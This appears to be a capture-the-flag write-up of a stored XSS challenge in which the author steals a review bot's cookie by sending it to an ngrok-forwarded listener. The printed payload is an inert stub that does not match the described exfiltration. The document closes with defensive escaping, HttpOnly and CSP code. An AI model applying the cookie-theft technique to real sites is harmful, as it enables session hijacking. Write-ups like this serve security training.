Tags: web xss
# HTB Cyber Santa is Coming to Town
# Web - Toy Workshop
We got an IP address and port to connect to over HTTP, along with a download of the Docker image. Just from examining the files we downloaded, we can see there is a submit API, though the format for submissions is not yet clear. Looking at the HTML for the website, we can see there is a submit form that is hidden. If we unhide it, it will format and submit the POST request for us. Using this and the knowledge, gained by looking at the downloaded files, that there is a bot with a flag hidden in its cookie, I submitted a commonly used XSS HTML payload. To get this to work, because the website was on WLAN, I spun up ngrok and had it forward to the local Python webserver I also spun up in another terminal window. Once I submitted the script below, I waited a few seconds and then I received the flag in the header of the GET request from the bot.
```html
<script>
document.write('');
</script>
```
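From the defender's side, the bot's cookie is reachable because a stored submission runs as markup in the bot's browser and the cookie is readable from script. The following is an added example, not code from the challenge or the original write-up: it renders submissions as escaped text, marks the session cookie `HttpOnly`, and adds a CSP as a second layer. The function names, the `message` field and the cookie name `session` are assumptions.

```javascript
// Added example (not the challenge's source): hardening a page that lists
// user submissions for a cookie-authenticated reviewer. All names are hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode text for an HTML element body or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render stored submissions as inert text instead of markup.
function renderSubmissions(rows) {
  const items = rows.map((r) => `<li>${escapeHtml(r.message)}</li>`).join('');
  return `<ul>${items}</ul>`;
}

// Session cookie for the reviewer: HttpOnly keeps it out of document.cookie.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Response headers for the review page; the CSP refuses inline script
// even if an escaping mistake slips through elsewhere.
function reviewPageHeaders(sessionValue) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'Set-Cookie': sessionCookie('session', sessionValue),
  };
}

// Constructed sample input: the submission shown in the write-up plus a benign one.
const sampleRows = [
  { message: "<script>\ndocument.write('');\n</script>" },
  { message: 'A wooden train & two dolls' },
];

console.log(renderSubmissions(sampleRows));
console.log(reviewPageHeaders('constructed-session-value'));
```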